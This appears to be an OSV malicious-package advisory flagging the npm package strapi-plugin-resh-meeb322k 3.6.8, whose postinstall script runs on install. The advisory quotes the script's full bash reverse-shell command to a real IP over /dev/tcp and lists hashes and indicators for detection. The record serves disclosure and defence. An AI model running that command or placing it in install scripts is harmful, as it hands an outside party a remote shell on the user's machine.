{"id":"MAL-2026-16183","summary":"Malicious code in strapi-plugin-resh-meeb322k (npm)","details":"\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (3016b01076e22e0a7bfd8e255bb5a5e03bdfe776f0dc16e60878210b5335fd42)\nstrapi-plugin-resh-meeb322k@3.6.8 declares a postinstall lifecycle script that executes postinstall.js on npm install. The script invokes `bash -c 'bash -i \u003e /dev/tcp/14.225.210.85/443 0\u003e&1'`, opening an interactive bash reverse shell from the installer's host to 14.225.210.85 on TCP/443. This grants whoever controls that IP an interactive remote shell on the installing machine with the privileges of the user running npm install. Package metadata self-describes as a 'Reverse shell payload for Strapi'.\n","modified":"2026-09-15T16:31:26.338150910Z","published":"2026-09-15T15:53:09Z","database_specific":{"malicious-packages-origins":[{"id":"IN-MAL-2026-020049","import_time":"2026-09-15T16:19:14.16478407Z","modified_time":"2026-09-15T15:53:09Z","sha256":"3016b01076e22e0a7bfd8e255bb5a5e03bdfe776f0dc16e60878210b5335fd42","source":"amazon-inspector","versions":["3.6.8"]}]},"references":[{"type":"PACKAGE","url":"https://www.npmjs.com/package/strapi-plugin-resh-meeb322k/v/3.6.8"}],"affected":[{"package":{"name":"strapi-plugin-resh-meeb322k","ecosystem":"npm","purl":"pkg:npm/strapi-plugin-resh-meeb322k"},"versions":["3.6.8"],"database_specific":{"cwes":[{"name":"Embedded Malicious Code","cweId":"CWE-506","description":"The product contains code that appears to be malicious in nature."}],"indicators":{"evidence_files":[{"path":"postinstall.js","sha256":"dfa7478eb73161feed4ab606f488ee08eda7efe631fb5fc3b1a78367d4f52ad4","tlsh":"ae11cb4166f9673562338ddde60b942ba3474e05703ae517b98c03171ec6c8cc5426fd"}],"package_integrity":[{"hashes":{"sha1":"7116d5e43a56b7a99055030f5980324d7bd3af3e","sha512_sri":"sha512-WS7Nm61Ub26Xl2al0I0E4YDRP4ys4dP01DgTdKDC4D21WD/MaNthByXR7UEJSZAEZCxEom/ak5QTF+94EZDTYw=="},"filename":"strapi-plugin-resh-meeb322k-3.6.8.tgz"}]},"source":"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/strapi-plugin-resh-meeb322k/MAL-2026-16183.json"}}],"schema_version":"1.9.0","credits":[{"name":"Amazon Inspector","contact":["inspector-research@amazon.com"],"type":"FINDER"}]}